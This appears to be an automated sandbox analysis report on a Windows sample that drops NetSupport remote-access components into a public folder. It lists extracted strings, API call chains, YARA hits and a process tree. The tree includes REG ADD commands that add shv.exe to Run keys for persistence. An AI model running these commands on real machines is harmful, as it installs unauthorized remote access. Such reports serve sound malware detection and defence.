                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,5_2_1101F6B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,5_2_1101F6B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,8_2_1101F6B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,8_2_11032EE0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,5_2_110321E0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,5_2_110076F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,5_2_11113880
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,8_2_11113880
                                Source: Yara matchFile source: 5.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.1afa5756820.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6336, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 3492, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 7008, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 6340, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 3244, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,5_2_111158B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,8_2_111158B0
                                Source: C:\Users\Public\Netstat\shv.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE18C2F0: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE18C2F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,5_2_1115DB40
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102D330
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE185E240_2_00007FF6FE185E24
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1ACE880_2_00007FF6FE1ACE88
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1A1F200_2_00007FF6FE1A1F20
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B07540_2_00007FF6FE1B0754
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE18F9300_2_00007FF6FE18F930
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1949280_2_00007FF6FE194928
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE19A4AC0_2_00007FF6FE19A4AC
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1A34840_2_00007FF6FE1A3484
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1AB1900_2_00007FF6FE1AB190
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1C20800_2_00007FF6FE1C2080
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1A2D580_2_00007FF6FE1A2D58
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1A8DF40_2_00007FF6FE1A8DF4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B07540_2_00007FF6FE1B0754
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE19AF180_2_00007FF6FE19AF18
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE195B600_2_00007FF6FE195B60
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1A4B980_2_00007FF6FE1A4B98
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE19BB900_2_00007FF6FE19BB90
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B8C1C0_2_00007FF6FE1B8C1C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1A39640_2_00007FF6FE1A3964
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE19C96C0_2_00007FF6FE19C96C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B89A00_2_00007FF6FE1B89A0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE191A480_2_00007FF6FE191A48
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE181AA40_2_00007FF6FE181AA4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1A2AB00_2_00007FF6FE1A2AB0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1BFA940_2_00007FF6FE1BFA94
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1C5AF80_2_00007FF6FE1C5AF8
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1BC8380_2_00007FF6FE1BC838
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1848400_2_00007FF6FE184840
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1C25500_2_00007FF6FE1C2550
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1876C00_2_00007FF6FE1876C0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1A53F00_2_00007FF6FE1A53F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE19B5340_2_00007FF6FE19B534
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE19F1800_2_00007FF6FE19F180
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1A21D00_2_00007FF6FE1A21D0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE19126C0_2_00007FF6FE19126C
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1872880_2_00007FF6FE187288
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE18C2F00_2_00007FF6FE18C2F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE18A3100_2_00007FF6FE18A310
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110733B05_2_110733B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110295905_2_11029590
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11061C905_2_11061C90
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110330105_2_11033010
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_111632205_2_11163220
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_111674855_2_11167485
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110454F05_2_110454F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1101B7605_2_1101B760
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_111258B05_2_111258B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1101BBA05_2_1101BBA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11087C605_2_11087C60
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110700905_2_11070090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110804805_2_11080480
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1115E9805_2_1115E980
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1101C9C05_2_1101C9C0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11061C908_2_11061C90
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110330108_2_11033010
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110733B08_2_110733B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_111632208_2_11163220
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110295908_2_11029590
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_111674858_2_11167485
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110454F08_2_110454F0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1101B7608_2_1101B760
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_111258B08_2_111258B0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1101BBA08_2_1101BBA0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11087C608_2_11087C60
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110700908_2_11070090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110804808_2_11080480
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1115E9808_2_1115E980
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1101C9C08_2_1101C9C0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110088AB8_2_110088AB
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11050D808_2_11050D80
                                Source: C:\Users\Public\Netstat\shv.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 110B7A20 appears 39 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11146450 appears 1094 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 1109D8C0 appears 32 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11146EC0 appears 39 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 110278E0 appears 91 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 1116F010 appears 66 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11029450 appears 1793 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 111603E3 appears 74 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11173663 appears 35 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 1105DD10 appears 555 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11081BB0 appears 77 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 1105DE40 appears 51 times
                                Source: C:\Users\Public\Netstat\shv.exeCode function: String function: 11164010 appears 64 times
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehtctl32.dll2 vs file.exe
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll2 vs file.exe
                                Source: file.exe, 00000000.00000003.1673741447.000001AFA58C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                Source: classification engineClassification label: mal92.rans.evad.winEXE@19/13@1/2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE18B6D8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF6FE18B6D8
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,5_2_1109D440
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,5_2_1109D4D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,8_2_1109D440
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,8_2_1109D4D0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,5_2_11115B70
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1A8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF6FE1A8624
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,5_2_11127E10
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\NetstatJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2872:120:WilError_03
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: file.exeReversingLabs: Detection: 39%
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
                                Source: unknownProcess created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
                                Source: unknownProcess created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "Jump to behavior
